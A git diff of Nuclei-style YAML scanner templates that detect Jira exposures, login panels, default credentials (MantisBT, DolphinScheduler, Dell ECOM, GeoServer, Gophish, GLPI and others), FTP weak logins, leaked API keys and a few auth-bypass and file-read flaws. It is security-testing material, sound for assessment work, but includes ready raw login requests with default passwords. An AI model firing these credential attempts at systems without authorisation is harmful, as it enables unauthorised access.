jira-unauthenticated-projects - info: name: Jira Unauthenticated Projects author: TechbrunchFR - severity: low - + severity: info + tags: atlassian,jira requests: - method: GET path: diff --git a/poc/atlassian/jira_user_piker (copy 1).yaml b/poc/atlassian/jira_user_piker (copy 1).yaml index 24a41bc721..0a88ec36aa 100644 --- a/poc/atlassian/jira_user_piker (copy 1).yaml +++ b/poc/atlassian/jira_user_piker (copy 1).yaml @@ -2,14 +2,21 @@ id: jira-unauthenticated-user-picker info: name: Jira Unauthenticated User Picker - author: medbsq - severity: medium + author: TechbrunchFR + severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira -requests: +http: - method: GET path: - - "{{BaseURL}}/rest/api/user/picker?query=admin" + - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" + matchers: - - type: status - status: - - 200 \ No newline at end of file + - type: word + words: + - 'user-picker' + +# digest: 490a0046304402200087bccdda4eb25b5110e1333de30442f5744e55aa8f2b5db3cf5d01c54e3837022068d85868176036eb3b1420b5aa186064b791ca1486a60f7e1c8fed872ad1f402:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira_user_piker.yaml b/poc/atlassian/jira_user_piker.yaml index d1c65be6c6..24a41bc721 100644 --- a/poc/atlassian/jira_user_piker.yaml +++ b/poc/atlassian/jira_user_piker.yaml @@ -1,13 +1,15 @@ id: jira-unauthenticated-user-picker + info: name: Jira Unauthenticated User Picker author: medbsq severity: medium + requests: - method: GET path: - "{{BaseURL}}/rest/api/user/picker?query=admin" matchers: - type: status - status: - - 200 + status: + - 200 \ No newline at end of file diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml new file mode 100644 index 0000000000..4ffeb88644 --- /dev/null +++ b/poc/auth/Mantis-Default_login.yaml @@ -0,0 +1,46 @@ +id: mantisbt-default-credential + +info: + name: MantisBT Default Admin Login + author: For3stCo1d + severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mantisbt,default-login + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + return=index.php&username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - administrator + pass: + - root + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/dell-openmanager-login-6948.yaml b/poc/auth/dell-openmanager-login-6948.yaml new file mode 100644 index 0000000000..0f686806d6 --- /dev/null +++ b/poc/auth/dell-openmanager-login-6948.yaml @@ -0,0 +1,27 @@ +id: dell-openmanager-login + +info: + name: Dell OpenManage Switch Administrator + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22 + tags: panel,dell + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/config/authentication_page.htm' + + matchers-condition: or + matchers: + - type: word + words: + - 'Dell OpenManage Switch Administrator' + + - type: word + words: + - 'Log In' + - 'device/logOff_up_menu1.htm' + condition: and diff --git a/poc/auth/dell-wyse-login-6954.yaml b/poc/auth/dell-wyse-login-6954.yaml index 35fc5cc68a..88dfef6f03 100644 --- a/poc/auth/dell-wyse-login-6954.yaml +++ b/poc/auth/dell-wyse-login-6954.yaml @@ -1,19 +1,24 @@ id: dell-wyse-login + info: name: Dell Wyse Management Suite Login Panel author: gy741 severity: info - reference: https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/ + reference: + - https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/ tags: panel,dell,login + requests: - method: GET path: - '{{BaseURL}}/ccm-web/' + matchers-condition: and matchers: - type: word words: - "Wyse Management Suite" + - type: status status: - 200 diff --git a/poc/auth/directadmin-login-panel-7001.yaml b/poc/auth/directadmin-login-panel-7001.yaml index 8a4cabe2fa..054bcf4eb0 100644 --- a/poc/auth/directadmin-login-panel-7001.yaml +++ b/poc/auth/directadmin-login-panel-7001.yaml @@ -5,7 +5,8 @@ info: author: idealphase severity: info description: A modern control panel's primary purpose is to effectively facilitate the routine management of your hosting infrastructure and present these tasks simply and intuitively to both the user and to you as the administrator. - reference: https://www.directadmin.com/whats_new.php + reference: + - https://www.directadmin.com/whats_new.php metadata: shodan-query: title:"DirectAdmin Login" tags: panel,directadmin diff --git a/poc/auth/dolphinscheduler-default-login-7073.yaml b/poc/auth/dolphinscheduler-default-login-7073.yaml index c77249a51f..139ea8c34e 100644 --- a/poc/auth/dolphinscheduler-default-login-7073.yaml +++ b/poc/auth/dolphinscheduler-default-login-7073.yaml @@ -1,18 +1,20 @@ id: dolphinscheduler-default-login + info: name: Apache DolphinScheduler Default Login author: For3stCo1d - severity: high description: Apache DolphinScheduler default admin credentials were discovered. - reference: - - https://github.com/apache/dolphinscheduler + severity: high + reference: https://github.com/apache/dolphinscheduler + metadata: + shodan-query: http.title:"DolphinScheduler" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.title:"DolphinScheduler" tags: apache,dolphinscheduler,default-login,oss + requests: - raw: - | @@ -21,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded userName={{user}}&userPassword={{pass}} + attack: pitchfork payloads: user: - admin pass: - dolphinscheduler123 + matchers-condition: and matchers: - type: word @@ -35,6 +39,7 @@ requests: - '"msg":"login success"' - '"sessionId":' condition: and + - type: status status: - 200 diff --git a/poc/auth/druid-default-login-7096.yaml b/poc/auth/druid-default-login-7096.yaml index 4dd778392e..78d252b867 100644 --- a/poc/auth/druid-default-login-7096.yaml +++ b/poc/auth/druid-default-login-7096.yaml @@ -1,13 +1,10 @@ id: druid-default-login info: - name: Apache Druid Default Login + name: Druid Default Login author: pikpikcu severity: high - description: Apache Druid default login information (admin/admin) was discovered. tags: druid,default-login - classification: - cwe-id: CWE-798 requests: - raw: @@ -39,6 +36,4 @@ requests: - type: regex regex: - - "^success$" - -# Enhanced by mp on 2022/03/03 + - "^success$" \ No newline at end of file diff --git a/poc/auth/dvwa-default-login-7127.yaml b/poc/auth/dvwa-default-login-7127.yaml index 8a0518f83e..fdf974e494 100644 --- a/poc/auth/dvwa-default-login-7127.yaml +++ b/poc/auth/dvwa-default-login-7127.yaml @@ -1,4 +1,5 @@ id: dvwa-default-login + info: name: DVWA Default Login author: pdteam @@ -9,6 +10,7 @@ info: classification: cwe-id: CWE-798 tags: dvwa,default-login + requests: - raw: - | @@ -16,6 +18,7 @@ requests: Host: {{Hostname}} Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close + - | POST /login.php HTTP/1.1 Host: {{Hostname}} @@ -24,12 +27,14 @@ requests: Connection: close username={{username}}&password={{password}}&Login=Login&user_token={{token}} + payloads: username: - admin password: - password attack: pitchfork + extractors: - type: regex name: token @@ -38,12 +43,14 @@ requests: part: body regex: - "hidden' name='user_token' value='([0-9a-z]+)'" + - type: kval name: session internal: true part: body kval: - PHPSESSID + redirects: true matchers: - type: word diff --git a/poc/auth/dvwa-headless-automatic-login-7130.yaml b/poc/auth/dvwa-headless-automatic-login-7130.yaml index 9e45496b95..61d192f956 100644 --- a/poc/auth/dvwa-headless-automatic-login-7130.yaml +++ b/poc/auth/dvwa-headless-automatic-login-7130.yaml @@ -1,4 +1,5 @@ id: dvwa-headless-automatic-login + info: name: DVWA Headless Automatic Login author: pdteam diff --git a/poc/auth/emcecom-default-login-7211.yaml b/poc/auth/emcecom-default-login-7211.yaml index 199ac75ebe..7ec4aff9bc 100644 --- a/poc/auth/emcecom-default-login-7211.yaml +++ b/poc/auth/emcecom-default-login-7211.yaml @@ -1,35 +1,43 @@ id: dell-emc-ecom-default-login + info: name: Dell EMC ECOM Default Login author: Techryptic (@Tech) severity: high description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. - remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. - reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation - tags: dell,emc,ecom,default-login + reference: + - https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation classification: cwe-id: CWE-798 + remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. + If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. + tags: dell,emc,ecom,default-login + requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - root password: - calvin attack: pitchfork + matchers-condition: and matchers: - type: word words: - "Set-Cookie: ECOMSecurity" part: header + - type: word words: - "Welcome to ECOM" + - type: status status: - 200 diff --git a/poc/auth/fcm-server-key-7454.yaml b/poc/auth/fcm-server-key-7454.yaml index b5d0331291..a2b32ed85b 100644 --- a/poc/auth/fcm-server-key-7454.yaml +++ b/poc/auth/fcm-server-key-7454.yaml @@ -2,11 +2,11 @@ id: fcm-server-key info: name: FCM Server Key - author: Abss (@absshax) + author: absshax severity: high - - # Reference:- https://abss.me/posts/fcm-takeover - # FCM Project Credentials + reference: + - https://abss.me/posts/fcm-takeover + tags: exposure,token,google requests: - method: GET diff --git a/poc/auth/flir-default-login-7513.yaml b/poc/auth/flir-default-login-7513.yaml index d0b0b99721..13dbeca242 100644 --- a/poc/auth/flir-default-login-7513.yaml +++ b/poc/auth/flir-default-login-7513.yaml @@ -6,9 +6,9 @@ info: description: Flir default login credentials (admin/admin) were discovered. reference: - https://securitycamcenter.com/flir-default-password/ - tags: default-login,flir,camera,iot classification: cwe-id: CWE-798 + tags: default-login,flir,camera,iot requests: - raw: - | diff --git a/poc/auth/ftp-weak-credentials-7570.yaml b/poc/auth/ftp-weak-credentials-7570.yaml index 06181d3b73..a3c092e56a 100644 --- a/poc/auth/ftp-weak-credentials-7570.yaml +++ b/poc/auth/ftp-weak-credentials-7570.yaml @@ -1,27 +1,19 @@ id: ftp-weak-credentials info: - name: FTP Service - Credential Weakness + name: FTP Service with weak credentials author: pussycat0x - severity: high - description: An FTP service was accessed with easily guessed credentials. - reference: - - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ - classification: - cvss-score: 8.5 - cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N + severity: critical tags: network,ftp,default-login,service - metadata: - max-request: 2 -tcp: +network: - inputs: - data: "USER {{username}}\r\nPASS {{password}}\r\n" host: - "{{Hostname}}" - port: 21 + - "{{Host}}:21" attack: clusterbomb payloads: diff --git a/poc/auth/fuelcms-default-login-7572.yaml b/poc/auth/fuelcms-default-login-7572.yaml index 9a64ca8b8c..c46140539c 100644 --- a/poc/auth/fuelcms-default-login-7572.yaml +++ b/poc/auth/fuelcms-default-login-7572.yaml @@ -1,33 +1,34 @@ id: fuelcms-default-login + info: - name: Fuel CMS - Default Admin Discovery + name: Fuel CMS Default Credentials author: Adam Crosser severity: high description: Fuel CMS default admin credentials were discovered. reference: - https://docs.getfuelcms.com/general/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: fuelcms,default-login,oss + requests: - raw: - | GET /fuel/login HTTP/1.1 Host: {{Hostname}} + - | POST /fuel/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} + attack: pitchfork payloads: username: - admin password: - admin + cookie-reuse: true matchers-condition: and matchers: @@ -35,13 +36,16 @@ requests: part: header words: - "/fuel/dashboard" + - type: regex part: header regex: - 'fuel_(.*)=' + - type: status status: - 302 + extractors: - type: regex part: body @@ -50,5 +54,3 @@ requests: group: 1 regex: - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' - -# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/general-tokens-7580.yaml b/poc/auth/general-tokens-7580.yaml index c547032c3a..6ade1f3cd0 100644 --- a/poc/auth/general-tokens-7580.yaml +++ b/poc/auth/general-tokens-7580.yaml @@ -3,7 +3,7 @@ info: name: Generic Tokens author: nadino,geeknik severity: info - tags: exposure,token + tags: exposure,token,generic requests: - method: GET path: @@ -21,9 +21,11 @@ requests: - type: regex part: body regex: - - '(K|k)ey([U|u]p|[D|d]own|[P|p]ress)' - - '(K|k)eyboard(N|n)avigation' - - '[P|p]assword([E|e]mail[N|n]ot[F|f]ound[M|m]essage|[L|l]abel|[E|e]rror[M|m]essage|[M|m]essage)' + - '(?i)key(sinternal|up|down|press|boardnavigation|words?|board|ebrow|board_fill|_retry_interval|_fetched|_expiresat|board_shortcuts|s_close|s_previous|s_next|s_zoom|s_play_pause)' + - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' + - '(?i)(!native)|(.*keybindings)' + - '(?i)(layout|a)key' + - '(?i)token_expires_in' condition: or negative: true extractors: diff --git a/poc/auth/geoserver-default-login-7593.yaml b/poc/auth/geoserver-default-login-7593.yaml index 0c98134403..8a9e8d01ec 100644 --- a/poc/auth/geoserver-default-login-7593.yaml +++ b/poc/auth/geoserver-default-login-7593.yaml @@ -1,4 +1,5 @@ id: geoserver-default-login + info: name: Geoserver Default Admin Login author: For3stCo1d @@ -6,14 +7,14 @@ info: description: Geoserver default admin credentials were discovered. reference: - http://geoserver.org/ - metadata: - fofa-query: app="GeoServer" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + fofa-query: app="GeoServer" tags: geoserver,default-login + requests: - raw: - | @@ -22,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} + attack: pitchfork payloads: user: - admin pass: - geoserver + matchers-condition: and matchers: - type: dsl @@ -35,6 +38,7 @@ requests: - "contains(tolower(location), '/geoserver/web')" - "!contains(tolower(location), 'error=true')" condition: and + - type: status status: - 302 diff --git a/poc/auth/git-credentials-7644.yaml b/poc/auth/git-credentials-7644.yaml index 408fa710c4..cdbf50161e 100644 --- a/poc/auth/git-credentials-7644.yaml +++ b/poc/auth/git-credentials-7644.yaml @@ -1,7 +1,7 @@ id: git-credentials info: name: Github Authentication Dotfile - author: geeknik + author: nithissh severity: high tags: github,auth requests: diff --git a/poc/auth/github-personal-token-7657.yaml b/poc/auth/github-personal-token-7657.yaml index 4237031c54..0e5d75e684 100644 --- a/poc/auth/github-personal-token-7657.yaml +++ b/poc/auth/github-personal-token-7657.yaml @@ -3,7 +3,7 @@ info: name: Github Personal Token author: geeknik severity: high - tags: token,file + tags: token,file,github file: - extensions: - all diff --git a/poc/auth/gitlab-public-signup-7681.yaml b/poc/auth/gitlab-public-signup-7681.yaml index dab4bac4c0..079f9e77fd 100644 --- a/poc/auth/gitlab-public-signup-7681.yaml +++ b/poc/auth/gitlab-public-signup-7681.yaml @@ -1,9 +1,12 @@ id: gitlab-public-signup + info: name: GitLab public signup author: pdteam severity: info - tags: gitlab + metadata: + shodan-query: http.title:"GitLab" + tags: gitlab,misconfig requests: - method: GET @@ -26,6 +29,6 @@ requests: - 200 - type: word + negative: true words: - - '' - negative: true \ No newline at end of file + - '' \ No newline at end of file diff --git a/poc/auth/gitlab-uninitialized-password-7694.yaml b/poc/auth/gitlab-uninitialized-password-7694.yaml index a6cdfee354..9e37ead70a 100644 --- a/poc/auth/gitlab-uninitialized-password-7694.yaml +++ b/poc/auth/gitlab-uninitialized-password-7694.yaml @@ -8,12 +8,12 @@ info: Prior to version 14, GitLab installations required a root password to be set via the web UI. If the administrator skipped this step, any visitor could set a password and control the instance. - metadata: - shodan-query: http.title:"GitLab" reference: - https://gitlab.com/gitlab-org/gitlab/-/issues/211328 - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password + metadata: + shodan-query: http.title:"GitLab" tags: gitlab,misconfig,unauth requests: diff --git a/poc/auth/glpi-default-login-7733.yaml b/poc/auth/glpi-default-login-7733.yaml index c2ea4c26d7..63857480c0 100644 --- a/poc/auth/glpi-default-login-7733.yaml +++ b/poc/auth/glpi-default-login-7733.yaml @@ -1,19 +1,18 @@ id: glpi-default-login - info: name: GLPI Default Login author: andysvints severity: high tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. + description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. reference: https://glpi-project.org/ - + classification: + cwe-id: CWE-798 requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /front/login.php HTTP/1.1 Host: {{Hostname}} @@ -22,14 +21,12 @@ requests: Referer: {{BaseURL}} {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - attack: pitchfork payloads: user: - glpi pass: - glpi - extractors: - type: regex name: token @@ -38,7 +35,6 @@ requests: group: 1 regex: - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" - - type: regex name: name part: body @@ -46,7 +42,6 @@ requests: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - - type: regex name: password part: body @@ -54,14 +49,14 @@ requests: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' - - type: status status: - 200 + +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/google-api-key-7770.yaml b/poc/auth/google-api-key-7770.yaml index c1b8b0434c..87d61eaa24 100644 --- a/poc/auth/google-api-key-7770.yaml +++ b/poc/auth/google-api-key-7770.yaml @@ -1,20 +1,23 @@ id: google-api-key + info: name: Google API Key author: Swissky - severity: medium -requests: + severity: info + metadata: + max-request: 2 + tags: exposure,token,google + +http: - method: GET path: - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" + - "{{BaseURL}}/hopfully404" + extractors: - type: regex part: body regex: - "AIza[0-9A-Za-z\\-_]{35}" + +# digest: 4a0a004730450221008529a1cf21d244ce3327f73d3d68a4e1afc76d0dab02130fa43f449db87fb51802200b6b4d64369e56d8ebba8796e30b0cee88ca1318014c35dee345905fffdb4a3c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/google-earth-dlogin-7778.yaml b/poc/auth/google-earth-dlogin-7778.yaml index 7b88681c7f..8e29091076 100644 --- a/poc/auth/google-earth-dlogin-7778.yaml +++ b/poc/auth/google-earth-dlogin-7778.yaml @@ -1,42 +1,37 @@ id: google-earth-dlogin + info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking severity: high - description: Google Earth Enterprise default login credentials were discovered. - remediation: "To reset the username and password: sudo /opt/google/gehttpd/bin/htpasswd -c /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" - tags: default-login,google-earth - reference: - - https://johnjhacking.com/blog/gee-exploitation/ - - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + tags: default-login,google + reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html metadata: shodan-query: 'title:"GEE Server"' - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork payloads: username: - geapacheuser + password: - geeadmin + matchers-condition: and matchers: - type: status status: - 200 + - type: word condition: and words: - 'DashboardPanel' - - 'Earth Enterprise Server' - -# Enhanced by mp on 2022/03/10 + - 'Earth Enterprise Server' \ No newline at end of file diff --git a/poc/auth/gophish-default-login-7794.yaml b/poc/auth/gophish-default-login-7794.yaml index 9b2b924bb1..2bea18c8ad 100644 --- a/poc/auth/gophish-default-login-7794.yaml +++ b/poc/auth/gophish-default-login-7794.yaml @@ -1,31 +1,33 @@ id: gophish-default-login - info: - name: Gophish < v0.10.1 default credentials + name: Gophish < v0.10.1 Default Credentials author: arcc,dhiyaneshDK severity: high + description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. + reference: + - https://docs.getgophish.com/user-guide/getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: gophish,default-login - requests: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} - - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}} - attack: pitchfork payloads: user: - admin pass: - gophish - cookie-reuse: true extractors: - type: regex @@ -35,7 +37,6 @@ requests: group: 1 regex: - 'name="csrf_token" value="(.+?)"' - matchers: - type: dsl dsl: @@ -43,4 +44,6 @@ requests: - "contains(tolower(all_headers), 'location: /')" - "contains(tolower(all_headers), 'gophish')" - "status_code==302" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/hardcoded-api-keys.yaml b/poc/auth/hardcoded-api-keys.yaml new file mode 100644 index 0000000000..69cf27a6d5 --- /dev/null +++ b/poc/auth/hardcoded-api-keys.yaml @@ -0,0 +1,27 @@ +id: hardcoded-api-keys + +info: + name: Hardcoded API Keys + author: YoruYagami + severity: high + description: | + This template detects hardcoded API keys in the source code. Hardcoding API keys can lead to unauthorized access and abuse if the keys are extracted by attackers. It is recommended to securely store and manage API keys. + remediation: | + To remediate this issue, remove hardcoded API keys from the source code and use secure storage solutions such as environment variables, encrypted storage, or secure key management services. Example: + + ```java + // Store API keys securely, avoid hardcoding + String apiKey = getApiKeyFromSecureStorage(); + ``` + +file: + - extensions: + - java + - xml + - json + + matchers: + - type: regex + regex: + - "apikey=\"[A-Za-z0-9]+\"" + - "API_KEY = \"[A-Za-z0-9]+\"" diff --git a/poc/auth/hp-ilo-serial-key-disclosure-8024.yaml b/poc/auth/hp-ilo-serial-key-disclosure-8024.yaml index 0ce0566212..958575e51f 100644 --- a/poc/auth/hp-ilo-serial-key-disclosure-8024.yaml +++ b/poc/auth/hp-ilo-serial-key-disclosure-8024.yaml @@ -1,14 +1,18 @@ id: hp-ilo-serial-key-disclosure + info: name: HP ILO Serial Key Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json tags: exposure,config + requests: - method: GET path: - "{{BaseURL}}/xmldata?item=CpqKey" + matchers-condition: and matchers: - type: word @@ -18,6 +22,7 @@ requests: - "KEY" part: body condition: and + - type: status status: - 200 diff --git a/poc/auth/hp-switch-default-login-8036.yaml b/poc/auth/hp-switch-default-login-8036.yaml index 22810268d6..6142cb38aa 100644 --- a/poc/auth/hp-switch-default-login-8036.yaml +++ b/poc/auth/hp-switch-default-login-8036.yaml @@ -1,11 +1,17 @@ id: hp-switch-default-login info: - name: HP 1820-8G Switch J9979A Default Credential + name: HP 1820-8G Switch J9979A Default Login author: pussycat0x severity: high - reference: https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US + description: HP 1820-8G Switch J9979A default admin login credentials were discovered. + reference: + - https://support.hpe.com/hpesc/public/docDisplay?docId=a00077779en_us&docLocale=en_US + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: - fofa-query: 'HP 1820-8G Switch J9979A' + fofa-query: HP 1820-8G Switch J9979A tags: default-login,hp requests: - raw: @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/hrsale-unauthenticated-lfi-8041.yaml b/poc/auth/hrsale-unauthenticated-lfi-8041.yaml index a75b0f101b..c30bf2123a 100644 --- a/poc/auth/hrsale-unauthenticated-lfi-8041.yaml +++ b/poc/auth/hrsale-unauthenticated-lfi-8041.yaml @@ -4,8 +4,7 @@ info: author: 0x_Akoko severity: high description: This exploit allow you to download any readable file from server without permission and login session - reference: - - https://www.exploit-db.com/exploits/48920 + reference: https://www.exploit-db.com/exploits/48920 tags: hrsale,lfi requests: - method: GET diff --git a/poc/auth/huawei-router-auth-bypass-8073.yaml b/poc/auth/huawei-router-auth-bypass-8073.yaml index 4ad8b9d364..a094938e84 100644 --- a/poc/auth/huawei-router-auth-bypass-8073.yaml +++ b/poc/auth/huawei-router-auth-bypass-8073.yaml @@ -1,4 +1,5 @@ id: huawei-router-auth-bypass + info: name: Huawei Router Authentication Bypass author: gy741 @@ -7,6 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/48310 tags: huawei,auth-bypass,router + requests: - raw: - | @@ -14,14 +16,16 @@ requests: Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Referer: {{BaseURL}} + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "DeviceName" - "SerialNumber" - "HardwareVersion" - condition: and + condition: and \ No newline at end of file diff --git a/poc/auth/ibm-note-login-8110.yaml b/poc/auth/ibm-note-login-8110.yaml index a178a6d3b7..1762931023 100644 --- a/poc/auth/ibm-note-login-8110.yaml +++ b/poc/auth/ibm-note-login-8110.yaml @@ -4,8 +4,9 @@ info: name: IBM iNotes Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7122 - tags: panel + reference: + - https://www.exploit-db.com/ghdb/7122 + tags: panel,ibm requests: - method: GET diff --git a/poc/auth/icinga-web-login-8137.yaml b/poc/auth/icinga-web-login-8137.yaml index 0ef7258a86..b0383b79b2 100644 --- a/poc/auth/icinga-web-login-8137.yaml +++ b/poc/auth/icinga-web-login-8137.yaml @@ -4,7 +4,8 @@ info: name: Icinga Web 2 Login author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Icinga+Web+2+Login%22 tags: panel,icinga requests: diff --git a/poc/auth/idemia-biometrics-default-login-8138.yaml b/poc/auth/idemia-biometrics-default-login-8138.yaml index 05a7f16fbf..1a7ffa1347 100644 --- a/poc/auth/idemia-biometrics-default-login-8138.yaml +++ b/poc/auth/idemia-biometrics-default-login-8138.yaml @@ -2,14 +2,9 @@ id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: medium - description: IDEMIA BIOMetrics application default login credentials were discovered. - reference: - - https://www.google.com/search?q=idemia+password%3D+"12345" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 + severity: high + description: Default Login of password=12345 on IDEMIA BIOMetrics application. + reference: https://www.google.com/search?q=idemia+password%3D+"12345" tags: idemia,biometrics,default-login requests: - raw: @@ -36,5 +31,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/insecure-cookie-storage.yaml b/poc/auth/insecure-cookie-storage.yaml new file mode 100644 index 0000000000..e9cb18e207 --- /dev/null +++ b/poc/auth/insecure-cookie-storage.yaml @@ -0,0 +1,27 @@ +id: insecure-cookie-storage + +info: + name: Insecure Cookie Storage + author: YoruYagami + severity: high + description: | + This template detects insecure storage of cookies in WebView. Storing cookies in plain text can expose them to unauthorized access, leading to potential security issues such as session hijacking. + remediation: | + To remediate this issue, use secure storage mechanisms for cookies and ensure that sensitive cookies are marked as HttpOnly and Secure. Example: + + ```java + // Use secure storage mechanisms for cookies + CookieManager cookieManager = CookieManager.getInstance(); + cookieManager.setAcceptCookie(true); + cookieManager.setCookie("https://example.com", "sessionId=abc123; HttpOnly; Secure"); + ``` + +file: + - extensions: + - java + + matchers: + - type: word + words: + - "CookieManager" + - "setCookie" diff --git a/poc/auth/intelbras-login-8163.yaml b/poc/auth/intelbras-login-8163.yaml index 480e982896..84e797d22e 100644 --- a/poc/auth/intelbras-login-8163.yaml +++ b/poc/auth/intelbras-login-8163.yaml @@ -1,26 +1,23 @@ id: intelbras-login - info: name: Intelbras Login author: DhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/7272 + reference: + - https://www.exploit-db.com/ghdb/7272 metadata: shodan-query: http.title:"Intelbras" google-dork: intitle:"Intelbras" "All Rights 